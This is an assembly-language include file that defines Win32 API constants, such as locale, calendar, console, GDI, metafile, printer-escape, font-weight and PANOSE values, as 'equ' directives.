OF_PROMPT equ 2000h
OF_EXIST equ 4000h
OF_REOPEN equ 8000h
OFS_MAXPATHNAME equ 128
DONT_RESOLVE_DLL_REFERENCES equ 1h
TC_NORMAL equ 0
TC_HARDERR equ 1
TC_GP_TRAP equ 2
TC_SIGNAL equ 3
MAX_LEADBYTES equ 12
MB_PRECOMPOSED equ 1h
MB_COMPOSITE equ 2h
MB_USEGLYPHCHARS equ 4h
WC_DEFAULTCHECK equ 100h
WC_COMPOSITECHECK equ 200h
WC_DISCARDNS equ 10h
WC_SEPCHARS equ 20h
WC_DEFAULTCHAR equ 40h
CT_CTYPE1 equ 1h
CT_CTYPE2 equ 2h
CT_CTYPE3 equ 4h
C1_UPPER equ 1h
C1_LOWER equ 2h
C1_DIGIT equ 4h
C1_SPACE equ 8h
C1_PUNCT equ 10h
C1_CNTRL equ 20h
C1_BLANK equ 40h
C1_XDIGIT equ 80h
C1_ALPHA equ 100h
C2_LEFTTORIGHT equ 1h
C2_RIGHTTOLEFT equ 2h
C2_EUROPENUMBER equ 3h
C2_EUROPESEPARATOR equ 4h
C2_EUROPETERMINATOR equ 5h
C2_ARABICNUMBER equ 6h
C2_COMMONSEPARATOR equ 7h
C2_BLOCKSEPARATOR equ 8h
C2_SEGMENTSEPARATOR equ 9h
C2_WHITESPACE equ 0Ah
C2_OTHERNEUTRAL equ 0Bh
C2_NOTAPPLICABLE equ 0h
C3_NONSPACING equ 1h
C3_DIACRITIC equ 2h
C3_VOWELMARK equ 4h
C3_SYMBOL equ 8h
C3_NOTAPPLICABLE equ 0h
NORM_IGNORECASE equ 1h
NORM_IGNORENONSPACE equ 2h
NORM_IGNORESYMBOLS equ 4h
MAP_FOLDCZONE equ 10h
MAP_PRECOMPOSED equ 20h
MAP_COMPOSITE equ 40h
MAP_FOLDDIGITS equ 80h
LCMAP_LOWERCASE equ 100h
LCMAP_UPPERCASE equ 200h
LCMAP_SORTKEY equ 400h
LCMAP_BYTEREV equ 800h
SORT_STRINGSORT equ 1000h
CP_ACP equ 0
CP_OEMCP equ 1
CTRY_DEFAULT equ 0
CTRY_AUSTRALIA equ 61
CTRY_AUSTRIA equ 43
CTRY_BELGIUM equ 32
CTRY_BRAZIL equ 55
CTRY_CANADA equ 2
CTRY_DENMARK equ 45
CTRY_FINLAND equ 358
CTRY_FRANCE equ 33
CTRY_GERMANY equ 49
CTRY_ICELAND equ 354
CTRY_IRELAND equ 353
CTRY_ITALY equ 39
CTRY_JAPAN equ 81
CTRY_MEXICO equ 52
CTRY_NETHERLANDS equ 31
CTRY_NEW_ZEALAND equ 64
CTRY_NORWAY equ 47
CTRY_PORTUGAL equ 351
CTRY_PRCHINA equ 86
CTRY_SOUTH_KOREA equ 82
CTRY_SPAIN equ 34
CTRY_SWEDEN equ 46
CTRY_SWITZERLAND equ 41
CTRY_TAIWAN equ 886
CTRY_UNITED_KINGDOM equ 44
CTRY_UNITED_STATES equ 1
LOCALE_NOUSEROVERRIDE equ 80000000h
LOCALE_USER_DEFAULT equ 0400h ; LANG_NEUTRAL with SUBLANG_DEFAULT
LOCALE_ILANGUAGE equ 1h
LOCALE_SLANGUAGE equ 2h
LOCALE_SENGLANGUAGE equ 1001h
LOCALE_SABBREVLANGNAME equ 3h
LOCALE_SNATIVELANGNAME equ 4h
LOCALE_ICOUNTRY equ 5h
LOCALE_SCOUNTRY equ 6h
LOCALE_SENGCOUNTRY equ 1002h
LOCALE_SABBREVCTRYNAME equ 7h
LOCALE_SNATIVECTRYNAME equ 8h
LOCALE_IDEFAULTLANGUAGE equ 9h
LOCALE_IDEFAULTCOUNTRY equ 0Ah
LOCALE_IDEFAULTCODEPAGE equ 0Bh
LOCALE_SLIST equ 0Ch
LOCALE_IMEASURE equ 0Dh
LOCALE_SDECIMAL equ 0Eh
LOCALE_STHOUSAND equ 0Fh
LOCALE_SGROUPING equ 10h
LOCALE_IDIGITS equ 11h
LOCALE_ILZERO equ 12h
LOCALE_SNATIVEDIGITS equ 13h
LOCALE_SCURRENCY equ 14h
LOCALE_SINTLSYMBOL equ 15h
LOCALE_SMONDECIMALSEP equ 16h
LOCALE_SMONTHOUSANDSEP equ 17h
LOCALE_SMONGROUPING equ 18h
LOCALE_ICURRDIGITS equ 19h
LOCALE_IINTLCURRDIGITS equ 1Ah
LOCALE_ICURRENCY equ 1Bh
LOCALE_INEGCURR equ 1Ch
LOCALE_SDATE equ 1Dh
LOCALE_STIME equ 1Eh
LOCALE_SSHORTDATE equ 1Fh
LOCALE_SLONGDATE equ 20h
LOCALE_STIMEFORMAT equ 1003h
LOCALE_IDATE equ 21h
LOCALE_ILDATE equ 22h
LOCALE_ITIME equ 23h
LOCALE_ICENTURY equ 24h
LOCALE_ITLZERO equ 25h
LOCALE_IDAYLZERO equ 26h
LOCALE_IMONLZERO equ 27h
LOCALE_S1159 equ 28h
LOCALE_S2359 equ 29h
LOCALE_SDAYNAME1 equ 2Ah
LOCALE_SDAYNAME2 equ 2Bh
LOCALE_SDAYNAME3 equ 2Ch
LOCALE_SDAYNAME4 equ 2Dh
LOCALE_SDAYNAME5 equ 2Eh
LOCALE_SDAYNAME6 equ 2Fh
LOCALE_SDAYNAME7 equ 30h
LOCALE_SABBREVDAYNAME1 equ 31h
LOCALE_SABBREVDAYNAME2 equ 32h
LOCALE_SABBREVDAYNAME3 equ 33h
LOCALE_SABBREVDAYNAME4 equ 34h
LOCALE_SABBREVDAYNAME5 equ 35h
LOCALE_SABBREVDAYNAME6 equ 36h
LOCALE_SABBREVDAYNAME7 equ 37h
LOCALE_SMONTHNAME1 equ 38h
LOCALE_SMONTHNAME2 equ 39h
LOCALE_SMONTHNAME3 equ 3Ah
LOCALE_SMONTHNAME4 equ 3Bh
LOCALE_SMONTHNAME5 equ 3Ch
LOCALE_SMONTHNAME6 equ 3Dh
LOCALE_SMONTHNAME7 equ 3Eh
LOCALE_SMONTHNAME8 equ 3Fh
LOCALE_SMONTHNAME9 equ 40h
LOCALE_SMONTHNAME10 equ 41h
LOCALE_SMONTHNAME11 equ 42h
LOCALE_SMONTHNAME12 equ 43h
LOCALE_SABBREVMONTHNAME1 equ 44h
LOCALE_SABBREVMONTHNAME2 equ 45h
LOCALE_SABBREVMONTHNAME3 equ 46h
LOCALE_SABBREVMONTHNAME4 equ 47h
LOCALE_SABBREVMONTHNAME5 equ 48h
LOCALE_SABBREVMONTHNAME6 equ 49h
LOCALE_SABBREVMONTHNAME7 equ 4Ah
LOCALE_SABBREVMONTHNAME8 equ 4Bh
LOCALE_SABBREVMONTHNAME9 equ 4Ch
LOCALE_SABBREVMONTHNAME10 equ 4Dh
LOCALE_SABBREVMONTHNAME11 equ 4Eh
LOCALE_SABBREVMONTHNAME12 equ 4Fh
LOCALE_SABBREVMONTHNAME13 equ 100Fh
LOCALE_SPOSITIVESIGN equ 50h
LOCALE_SNEGATIVESIGN equ 51h
LOCALE_IPOSSIGNPOSN equ 52h
LOCALE_INEGSIGNPOSN equ 53h
LOCALE_IPOSSYMPRECEDES equ 54h
LOCALE_IPOSSEPBYSPACE equ 55h
LOCALE_INEGSYMPRECEDES equ 56h
LOCALE_INEGSEPBYSPACE equ 57h
TIME_NOMINUTESORSECONDS equ 1h
TIME_NOSECONDS equ 2h
TIME_NOTIMEMARKER equ 4h
TIME_FORCE24HOURFORMAT equ 8h
DATE_SHORTDATE equ 1h
DATE_LONGDATE equ 2h
TF_FORCEDRIVE equ 80h
LOCKFILE_FAIL_IMMEDIATELY equ 1h
LOCKFILE_EXCLUSIVE_LOCK equ 2h
LNOTIFY_OUTOFMEM equ 0
LNOTIFY_MOVE equ 1
LNOTIFY_DISCARD equ 2
SLE_ERROR equ 1h
SLE_MINORERROR equ 2h
SLE_WARNING equ 3h
SEM_FAILCRITICALERRORS equ 1h
SEM_NOGPFAULTERRORBOX equ 2h
SEM_NOOPENFILEERRORBOX equ 8000h
RT_CURSOR equ 1
RT_BITMAP equ 2
RT_ICON equ 3
RT_MENU equ 4
RT_DIALOG equ 5
RT_STRING equ 6
RT_FONTDIR equ 7
RT_FONT equ 8
RT_ACCELERATOR equ 9
RT_RCDATA equ 10
DFC_CAPTION equ 1
DFC_MENU equ 2
DFC_SCROLL equ 3
DFC_BUTTON equ 4
DFCS_CAPTIONCLOSE equ 0000h
DFCS_CAPTIONMIN equ 0001h
DFCS_CAPTIONMAX equ 0002h
DFCS_CAPTIONRESTORE equ 0003h
DFCS_CAPTIONHELP equ 0004h
DFCS_MENUARROW equ 0000h
DFCS_MENUCHECK equ 0001h
DFCS_MENUBULLET equ 0002h
DFCS_MENUARROWRIGHT equ 0004h
DFCS_SCROLLUP equ 0000h
DFCS_SCROLLDOWN equ 0001h
DFCS_SCROLLLEFT equ 0002h
DFCS_SCROLLRIGHT equ 0003h
DFCS_SCROLLCOMBOBOX equ 0005h
DFCS_SCROLLSIZEGRIP equ 0008h
DFCS_SCROLLSIZEGRIPRIGHT equ 0010h
DFCS_BUTTONCHECK equ 0000h
DFCS_BUTTONRADIOIMAGE equ 0001h
DFCS_BUTTONRADIOMASK equ 0002h
DFCS_BUTTONRADIO equ 0004h
DFCS_BUTTON3STATE equ 0008h
DFCS_BUTTONPUSH equ 0010h
DFCS_INACTIVE equ 0100h
DFCS_PUSHED equ 0200h
DFCS_CHECKED equ 0400h
DFCS_ADJUSTRECT equ 2000h
DFCS_FLAT equ 4000h
DFCS_MONO equ 8000h
DDD_RAW_TARGET_PATH equ 1h
DDD_REMOVE_DEFINITION equ 2h
DDD_EXACT_MATCH_ON_REMOVE equ 4h
MAX_PATH equ 260 ; Win32 maximum path length including the terminating null
MOVEFILE_REPLACE_EXISTING equ 1h
MOVEFILE_COPY_ALLOWED equ 2h
MOVEFILE_DELAY_UNTIL_REBOOT equ 4h
TokenUser equ 1
TokenGroups equ 2
TokenPrivileges equ 3
TokenOwner equ 4
TokenPrimaryGroup equ 5
TokenDefaultDacl equ 6
TokenSource equ 7
TokenType equ 8
TokenImpersonationLevel equ 9
TokenStatistics equ 10
GET_TAPE_MEDIA_INFORMATION equ 0
GET_TAPE_DRIVE_INFORMATION equ 1
SET_TAPE_MEDIA_INFORMATION equ 0
SET_TAPE_DRIVE_INFORMATION equ 1
FORMAT_MESSAGE_ALLOCATE_BUFFER equ 100h
FORMAT_MESSAGE_IGNORE_INSERTS equ 200h
FORMAT_MESSAGE_FROM_STRING equ 400h
FORMAT_MESSAGE_FROM_HMODULE equ 800h
FORMAT_MESSAGE_FROM_SYSTEM equ 1000h
FORMAT_MESSAGE_ARGUMENT_ARRAY equ 2000h
FORMAT_MESSAGE_MAX_WIDTH_MASK equ 0FFh
TLS_OUT_OF_INDEXES equ 0FFFFFFFFh ; full 32-bit -1 returned by TlsAlloc on failure
BACKUP_DATA equ 1h
BACKUP_EA_DATA equ 2h
BACKUP_SECURITY_DATA equ 3h
BACKUP_ALTERNATE_DATA equ 4h
BACKUP_LINK equ 5h
STREAM_MODIFIED_WHEN_READ equ 1h
STREAM_CONTAINS_SECURITY equ 2h
STARTF_USESHOWWINDOW equ 1h
STARTF_USESIZE equ 2h
STARTF_USEPOSITION equ 4h
STARTF_USECOUNTCHARS equ 8h
STARTF_USEFILLATTRIBUTE equ 10h
STARTF_RUNFULLSCREEN equ 20h
STARTF_FORCEONFEEDBACK equ 40h
STARTF_FORCEOFFFEEDBACK equ 80h
STARTF_USESTDHANDLES equ 100h
SHUTDOWN_NORETRY equ 1h
MAX_DEFAULTCHAR equ 2
CAL_ICALINTVALUE equ 1h
CAL_SCALNAME equ 2h
CAL_IYEAROFFSETRANGE equ 3h
CAL_SERASTRING equ 4h
CAL_SSHORTDATE equ 5h
CAL_SLONGDATE equ 6h
CAL_SDAYNAME1 equ 7h
CAL_SDAYNAME2 equ 8h
CAL_SDAYNAME3 equ 9h
CAL_SDAYNAME4 equ 0Ah
CAL_SDAYNAME5 equ 0Bh
CAL_SDAYNAME6 equ 0Ch
CAL_SDAYNAME7 equ 0Dh
CAL_SABBREVDAYNAME1 equ 0Eh
CAL_SABBREVDAYNAME2 equ 0Fh
CAL_SABBREVDAYNAME3 equ 10h
CAL_SABBREVDAYNAME4 equ 11h
CAL_SABBREVDAYNAME5 equ 12h
CAL_SABBREVDAYNAME6 equ 13h
CAL_SABBREVDAYNAME7 equ 14h
CAL_SMONTHNAME1 equ 15h
CAL_SMONTHNAME2 equ 16h
CAL_SMONTHNAME3 equ 17h
CAL_SMONTHNAME4 equ 18h
CAL_SMONTHNAME5 equ 19h
CAL_SMONTHNAME6 equ 1Ah
CAL_SMONTHNAME7 equ 1Bh
CAL_SMONTHNAME8 equ 1Ch
CAL_SMONTHNAME9 equ 1Dh
CAL_SMONTHNAME10 equ 1Eh
CAL_SMONTHNAME11 equ 1Fh
CAL_SMONTHNAME12 equ 20h
CAL_SMONTHNAME13 equ 21h
CAL_SABBREVMONTHNAME1 equ 22h
CAL_SABBREVMONTHNAME2 equ 23h
CAL_SABBREVMONTHNAME3 equ 24h
CAL_SABBREVMONTHNAME4 equ 25h
CAL_SABBREVMONTHNAME5 equ 26h
CAL_SABBREVMONTHNAME6 equ 27h
CAL_SABBREVMONTHNAME7 equ 28h
CAL_SABBREVMONTHNAME8 equ 29h
CAL_SABBREVMONTHNAME9 equ 2Ah
CAL_SABBREVMONTHNAME10 equ 2Bh
CAL_SABBREVMONTHNAME11 equ 2Ch
CAL_SABBREVMONTHNAME12 equ 2Dh
CAL_SABBREVMONTHNAME13 equ 2Eh
ENUM_ALL_CALENDARS equ 0FFFFFFFFh ; full 32-bit -1
CAL_GREGORIAN equ 1
CAL_GREGORIAN_US equ 2
CAL_JAPAN equ 3
CAL_TAIWAN equ 4
CAL_KOREA equ 5
RIGHT_ALT_PRESSED equ 1h
LEFT_ALT_PRESSED equ 2h
RIGHT_CTRL_PRESSED equ 4h
LEFT_CTRL_PRESSED equ 8h
SHIFT_PRESSED equ 10h
NUMLOCK_ON equ 20h
SCROLLLOCK_ON equ 40h
CAPSLOCK_ON equ 80h
ENHANCED_KEY equ 100h
FROM_LEFT_1ST_BUTTON_PRESSED equ 1h
RIGHTMOST_BUTTON_PRESSED equ 2h
FROM_LEFT_2ND_BUTTON_PRESSED equ 4h
FROM_LEFT_3RD_BUTTON_PRESSED equ 8h
FROM_LEFT_4TH_BUTTON_PRESSED equ 10h
MOUSE_MOVED equ 1h
DOUBLE_CLICK equ 2h
KEY_EVENT equ 1h
mouse_eventC equ 2h
WINDOW_BUFFER_SIZE_EVENT equ 4h
MENU_EVENT equ 8h
FOCUS_EVENT equ 10h
FOREGROUND_BLUE equ 1h
FOREGROUND_GREEN equ 2h
FOREGROUND_RED equ 4h
FOREGROUND_INTENSITY equ 8h
BACKGROUND_BLUE equ 10h
BACKGROUND_GREEN equ 20h
BACKGROUND_RED equ 40h
BACKGROUND_INTENSITY equ 80h
CTRL_C_EVENT equ 0
CTRL_BREAK_EVENT equ 1
CTRL_CLOSE_EVENT equ 2
CTRL_LOGOFF_EVENT equ 5
CTRL_SHUTDOWN_EVENT equ 6
ENABLE_PROCESSED_INPUT equ 1h
ENABLE_LINE_INPUT equ 2h
ENABLE_ECHO_INPUT equ 4h
ENABLE_WINDOW_INPUT equ 8h
ENABLE_MOUSE_INPUT equ 10h
ENABLE_PROCESSED_OUTPUT equ 1h
ENABLE_WRAP_AT_EOL_OUTPUT equ 2h
CONSOLE_TEXTMODE_BUFFER equ 1
R2_BLACK equ 1
R2_NOTMERGEPEN equ 2
R2_MASKNOTPEN equ 3
R2_NOTCOPYPEN equ 4
R2_MASKPENNOT equ 5
R2_NOT equ 6
R2_XORPEN equ 7
R2_NOTMASKPEN equ 8
R2_MASKPEN equ 9
R2_NOTXORPEN equ 10
R2_NOP equ 11
R2_MERGENOTPEN equ 12
R2_COPYPEN equ 13
R2_MERGEPENNOT equ 14
R2_MERGEPEN equ 15
R2_WHITE equ 16
R2_LAST equ 16
SRCCOPY equ 0CC0020h
SRCPAINT equ 0EE0086h
SRCAND equ 8800C6h
SRCINVERT equ 660046h
SRCERASE equ 440328h
NOTSRCCOPY equ 330008h
NOTSRCERASE equ 1100A6h
MERGECOPY equ 0C000CAh
MERGEPAINT equ 0BB0226h
PATCOPY equ 0F00021h
PATPAINT equ 0FB0A09h
PATINVERT equ 5A0049h
DSTINVERT equ 550009h
BLACKNESS equ 42h
WHITENESS equ 0FF0062h
GDI_ERROR equ 0FFFFFFFFh ; full 32-bit -1 returned by GDI calls on failure
HGDI_ERROR equ 0FFFFFFFFh
ERRORAPI equ 0
NULLREGION equ 1
SIMPLEREGION equ 2
COMPLEXREGION equ 3
RGN_AND equ 1
RGN_OR equ 2
RGN_XOR equ 3
RGN_DIFF equ 4
RGN_COPY equ 5
RGN_MIN equ RGN_AND
RGN_MAX equ RGN_COPY
BLACKONWHITE equ 1
WHITEONBLACK equ 2
COLORONCOLOR equ 3
HALFTONE equ 4
MAXSTRETCHBLTMODE equ 4
ALTERNATE equ 1
WINDING equ 2
POLYFILL_LAST equ 2
TA_NOUPDATECP equ 0
TA_UPDATECP equ 1
TA_LEFT equ 0
TA_RIGHT equ 2
TA_CENTER equ 6
TA_TOP equ 0
TA_BOTTOM equ 8
TA_BASELINE equ 24
TA_MASK equ TA_BASELINE+TA_CENTER+TA_UPDATECP
VTA_BASELINE equ TA_BASELINE
VTA_LEFT equ TA_BOTTOM
VTA_RIGHT equ TA_TOP
VTA_CENTER equ TA_CENTER
VTA_BOTTOM equ TA_RIGHT
VTA_TOP equ TA_LEFT
ETO_GRAYED equ 1
ETO_OPAQUE equ 2
ETO_CLIPPED equ 4
ASPECT_FILTERING equ 1h
DCB_RESET equ 1h
DCB_ACCUMULATE equ 2h
DCB_DIRTY equ DCB_ACCUMULATE
DCB_SET equ DCB_RESET|DCB_ACCUMULATE
DCB_ENABLE equ 4h
DCB_DISABLE equ 8h
META_SETBKCOLOR equ 201h
META_SETBKMODE equ 102h
META_SETMAPMODE equ 103h
META_SETROP2 equ 104h
META_SETRELABS equ 105h
META_SETPOLYFILLMODE equ 106h
META_SETSTRETCHBLTMODE equ 107h
META_SETTEXTCHAREXTRA equ 108h
META_SETTEXTCOLOR equ 209h
META_SETTEXTJUSTIFICATION equ 20Ah
META_SETWINDOWORG equ 20Bh
META_SETWINDOWEXT equ 20Ch
META_SETVIEWPORTORG equ 20Dh
META_SETVIEWPORTEXT equ 20Eh
META_OFFSETWINDOWORG equ 20Fh
META_SCALEWINDOWEXT equ 410h
META_OFFSETVIEWPORTORG equ 211h
META_SCALEVIEWPORTEXT equ 412h
META_LINETO equ 213h
META_MOVETO equ 214h
META_EXCLUDECLIPRECT equ 415h
META_INTERSECTCLIPRECT equ 416h
META_ARC equ 817h
META_ELLIPSE equ 418h
META_FLOODFILL equ 419h
META_PIE equ 81Ah
META_RECTANGLE equ 41Bh
META_ROUNDRECT equ 61Ch
META_PATBLT equ 61Dh
META_SAVEDC equ 1Eh
META_SETPIXEL equ 41Fh
META_OFFSETCLIPRGN equ 220h
META_TEXTOUT equ 521h
META_BITBLT equ 922h
META_STRETCHBLT equ 0B23h
META_POLYGON equ 324h
META_POLYLINE equ 325h
META_ESCAPE equ 626h
META_RESTOREDC equ 127h
META_FILLREGION equ 228h
META_FRAMEREGION equ 429h
META_INVERTREGION equ 12Ah
META_PAINTREGION equ 12Bh
META_SELECTCLIPREGION equ 12Ch
META_SELECTOBJECT equ 12Dh
META_SETTEXTALIGN equ 12Eh
META_CHORD equ 830h
META_SETMAPPERFLAGS equ 231h
META_EXTTEXTOUT equ 0A32h
META_SETDIBTODEV equ 0D33h
META_SELECTPALETTE equ 234h
META_REALIZEPALETTE equ 35h
META_ANIMATEPALETTE equ 436h
META_SETPALENTRIES equ 37h
META_POLYPOLYGON equ 538h
META_RESIZEPALETTE equ 139h
META_DIBBITBLT equ 940h
META_DIBSTRETCHBLT equ 0B41h
META_DIBCREATEPATTERNBRUSH equ 142h
META_STRETCHDIB equ 0F43h
META_EXTFLOODFILL equ 548h
META_DELETEOBJECT equ 1F0h
META_CREATEPALETTE equ 0F7h
META_CREATEPATTERNBRUSH equ 1F9h
META_CREATEPENINDIRECT equ 2FAh
META_CREATEFONTINDIRECT equ 2FBh
META_CREATEBRUSHINDIRECT equ 2FCh
META_CREATEREGION equ 6FFh
NEWFRAME equ 1
AbortDocC equ 2
NEXTBAND equ 3
SETCOLORTABLE equ 4
GETCOLORTABLE equ 5
FLUSHOUTPUT equ 6
DRAFTMODE equ 7
QUERYESCSUPPORT equ 8
SETABORTPROC equ 9
StartDocC equ 10
EndDocC equ 11
GETPHYSPAGESIZE equ 12
GETPRINTINGOFFSET equ 13
GETSCALINGFACTOR equ 14
MFCOMMENT equ 15
GETPENWIDTH equ 16
SETCOPYCOUNT equ 17
SELECTPAPERSOURCE equ 18
DEVICEDATA equ 19
PASSTHROUGH equ 19
GETTECHNOLGY equ 20
GETTECHNOLOGY equ 20
SETLINECAP equ 21
SETLINEJOIN equ 22
SetMiterLimitC equ 23
BANDINFO equ 24
DRAWPATTERNRECT equ 25
GETVECTORPENSIZE equ 26
GETVECTORBRUSHSIZE equ 27
ENABLEDUPLEX equ 28
GETSETPAPERBINS equ 29
GETSETPRINTORIENT equ 30
ENUMPAPERBINS equ 31
SETDIBSCALING equ 32
EPSPRINTING equ 33
ENUMPAPERMETRICS equ 34
GETSETPAPERMETRICS equ 35
POSTSCRIPT_DATA equ 37
POSTSCRIPT_IGNORE equ 38
MOUSETRAILS equ 39
GETDEVICEUNITS equ 42
GETEXTENDEDTEXTMETRICS equ 256
GETEXTENTTABLE equ 257
GETPAIRKERNTABLE equ 258
GETTRACKKERNTABLE equ 259
ExtTextOutC equ 512
GETFACENAME equ 513
DOWNLOADFACE equ 514
ENABLERELATIVEWIDTHS equ 768
ENABLEPAIRKERNING equ 769
SETKERNTRACK equ 770
SETALLJUSTVALUES equ 771
SETCHARSET equ 772
StretchBltC equ 2048
GETSETSCREENPARAMS equ 3072
BEGIN_PATH equ 4096
CLIP_TO_PATH equ 4097
END_PATH equ 4098
EXT_DEVICE_CAPS equ 4099
RESTORE_CTM equ 4100
SAVE_CTM equ 4101
SET_ARC_DIRECTION equ 4102
SET_BACKGROUND_COLOR equ 4103
SET_POLY_MODE equ 4104
SET_SCREEN_ANGLE equ 4105
SET_SPREAD equ 4106
TRANSFORM_CTM equ 4107
SET_CLIP_BOX equ 4108
SET_BOUNDS equ 4109
SET_MIRROR_MODE equ 4110
OPENCHANNEL equ 4110
DOWNLOADHEADER equ 4111
CLOSECHANNEL equ 4112
POSTSCRIPT_PASSTHROUGH equ 4115
ENCAPSULATED_POSTSCRIPT equ 4116
SP_NOTREPORTED equ 4000h
SP_ERROR equ -1
SP_APPABORT equ -2
SP_USERABORT equ -3
SP_OUTOFDISK equ -4
SP_OUTOFMEMORY equ -5
PR_JOBSTATUS equ 0h
OBJ_PEN equ 1
OBJ_BRUSH equ 2
OBJ_DC equ 3
OBJ_METADC equ 4
OBJ_PAL equ 5
OBJ_FONT equ 6
OBJ_BITMAP equ 7
OBJ_REGION equ 8
OBJ_METAFILE equ 9
OBJ_MEMDC equ 10
OBJ_EXTPEN equ 11
OBJ_ENHMETADC equ 12
OBJ_ENHMETAFILE equ 13
MWT_IDENTITY equ 1
MWT_LEFTMULTIPLY equ 2
MWT_RIGHTMULTIPLY equ 3
MWT_MIN equ MWT_IDENTITY
MWT_MAX equ MWT_RIGHTMULTIPLY
BI_RGB equ 0
BI_RLE8 equ 1
BI_RLE4 equ 2
BI_bitfields equ 3
NTM_REGULAR equ 40h
NTM_BOLD equ 20h
NTM_ITALIC equ 1h
TMPF_FIXED_PITCH equ 1h
TMPF_VECTOR equ 2h
TMPF_DEVICE equ 8h
TMPF_TRUETYPE equ 4h
LF_FACESIZE equ 32
LF_FULLFACESIZE equ 64
OUT_DEFAULT_PRECIS equ 0
OUT_STRING_PRECIS equ 1
OUT_CHARACTER_PRECIS equ 2
OUT_STROKE_PRECIS equ 3
OUT_TT_PRECIS equ 4
OUT_DEVICE_PRECIS equ 5
OUT_RASTER_PRECIS equ 6
OUT_TT_ONLY_PRECIS equ 7
OUT_OUTLINE_PRECIS equ 8
CLIP_DEFAULT_PRECIS equ 0
CLIP_CHARACTER_PRECIS equ 1
CLIP_STROKE_PRECIS equ 2
CLIP_MASK equ 0Fh
CLIP_LH_ANGLES equ 16
CLIP_TT_ALWAYS equ 32
CLIP_EMBEDDED equ 128
DEFAULT_QUALITY equ 0
DRAFT_QUALITY equ 1
PROOF_QUALITY equ 2
DEFAULT_PITCH equ 0
FIXED_PITCH equ 1
VARIABLE_PITCH equ 2
ANSI_CHARSET equ 0
DEFAULT_CHARSET equ 1
SYMBOL_CHARSET equ 2
SHIFTJIS_CHARSET equ 128
HANGEUL_CHARSET equ 129
CHINESEBIG5_CHARSET equ 136
OEM_CHARSET equ 255
FF_DONTCARE equ 0
FF_ROMAN equ 16
FF_SWISS equ 32
FF_MODERN equ 48
FF_SCRIPT equ 64
FF_DECORATIVE equ 80
FW_DONTCARE equ 0
FW_THIN equ 100
FW_EXTRALIGHT equ 200
FW_LIGHT equ 300
FW_NORMAL equ 400
FW_MEDIUM equ 500
FW_SEMIBOLD equ 600
FW_BOLD equ 700
FW_EXTRABOLD equ 800
FW_HEAVY equ 900
FW_ULTRALIGHT equ FW_EXTRALIGHT
FW_REGULAR equ FW_NORMAL
FW_DEMIBOLD equ FW_SEMIBOLD
FW_ULTRABOLD equ FW_EXTRABOLD
FW_BLACK equ FW_HEAVY
PANOSE_COUNT equ 10
PAN_FAMILYTYPE_INDEX equ 0
PAN_SERIFSTYLE_INDEX equ 1
PAN_WEIGHT_INDEX equ 2
PAN_PROPORTION_INDEX equ 3
PAN_CONTRAST_INDEX equ 4
PAN_STROKEVARIATION_INDEX equ 5
PAN_ARMSTYLE_INDEX equ 6
PAN_LETTERFORM_INDEX equ 7
PAN_MIDLINE_INDEX equ 8
PAN_XHEIGHT_INDEX equ 9
PAN_CULTURE_LATIN equ 0
PAN_ANY equ 0
PAN_NO_FIT equ 1
PAN_FAMILY_TEXT_DISPLAY equ 2
PAN_FAMILY_SCRIPT equ 3
PAN_FAMILY_DECORATIVE equ 4
PAN_FAMILY_PICTORIAL equ 5
PAN_SERIF_COVE equ 2
PAN_SERIF_OBTUSE_COVE equ 3
PAN_SERIF_SQUARE_COVE equ 4
PAN_SERIF_OBTUSE_SQUARE_COVE equ 5
PAN_SERIF_SQUARE equ 6
PAN_SERIF_THIN equ 7
PAN_SERIF_BONE equ 8
PAN_SERIF_EXAGGERATED equ 9
PAN_SERIF_TRIANGLE equ 10
PAN_SERIF_NORMAL_SANS equ 11
PAN_SERIF_OBTUSE_SANS equ 12
PAN_SERIF_PERP_SANS equ 13
PAN_SERIF_FLARED equ 14
PAN_SERIF_ROUNDED equ 15
PAN_WEIGHT_VERY_LIGHT equ 2
PAN_WEIGHT_LIGHT equ 3
PAN_WEIGHT_THIN equ 4
PAN_WEIGHT_BOOK equ 5
PAN_WEIGHT_MEDIUM equ 6
PAN_WEIGHT_DEMI equ 7
PAN_WEIGHT_BOLD equ 8
PAN_WEIGHT_HEAVY equ 9
PAN_WEIGHT_BLACK equ 10
PAN_WEIGHT_NORD equ 11
PAN_PROP_OLD_STYLE equ 2
PAN_PROP_MODERN equ 3
PAN_PROP_EVEN_WIDTH equ 4
PAN_PROP_EXPANDED equ 5
PAN_PROP_CONDENSED equ 6
PAN_PROP_VERY_EXPANDED equ 7
PAN_PROP_VERY_CONDENSED equ 8
PAN_PROP_MONOSPACED equ 9
PAN_CONTRAST_NONE equ 2
PAN_CONTRAST_VERY_LOW equ 3
PAN_CONTRAST_LOW equ 4
PAN_CONTRAST_MEDIUM_LOW equ 5
PAN_CONTRAST_MEDIUM equ 6
PAN_CONTRAST_MEDIUM_HIGH equ 7
PAN_CONTRAST_HIGH equ 8
PAN_CONTRAST_VERY_HIGH equ 9
PAN_STROKE_GRADUAL_DIAG equ 2
PAN_STROKE_GRADUAL_TRAN equ 3
PAN_STROKE_GRADUAL_VERT equ 4
PAN_STROKE_GRADUAL_HORZ equ 5
PAN_STROKE_RAPID_VERT equ 6
PAN_STROKE_RAPID_HORZ equ 7
PAN_STROKE_INSTANT_VERT equ 8
PAN_STRAIGHT_ARMS_HORZ equ 2
PAN_STRAIGHT_ARMS_WEDGE equ 3
PAN_STRAIGHT_ARMS_VERT equ 4
PAN_STRAIGHT_ARMS_SINGLE_SERIF equ 5
PAN_STRAIGHT_ARMS_DOUBLE_SERIF equ 6
PAN_BENT_ARMS_HORZ equ 7
PAN_BENT_ARMS_WEDGE equ 8
PAN_BENT_ARMS_VERT equ 9
PAN_BENT_ARMS_SINGLE_SERIF equ 10
PAN_BENT_ARMS_DOUBLE_SERIF equ 11
PAN_LETT_NORMAL_CONTACT equ 2
PAN_LETT_NORMAL_WEIGHTED equ 3
PAN_LETT_NORMAL_BOXED equ 4
PAN_LETT_NORMAL_FLATTENED equ 5
PAN_LETT_NORMAL_ROUNDED equ 6
PAN_LETT_NORMAL_OFF_CENTER equ 7
PAN_LETT_NORMAL_SQUARE equ 8
PAN_LETT_OBLIQUE_CONTACT equ 9
PAN_LETT_OBLIQUE_WEIGHTED equ 10
PAN_LETT_OBLIQUE_BOXED equ 11
PAN_LETT_OBLIQUE_FLATTENED equ 12
PAN_LETT_OBLIQUE_ROUNDED equ 13
PAN_LETT_OBLIQUE_OFF_CENTER equ 14
PAN_LETT_OBLIQUE_SQUARE equ 15
PAN_MIDLINE_STANDARD_TRIMMED equ 2
PAN_MIDLINE_STANDARD_POINTED equ 3
PAN_MIDLINE_STANDARD_SERIFED equ 4
PAN_MIDLINE_HIGH_TRIMMED equ 5
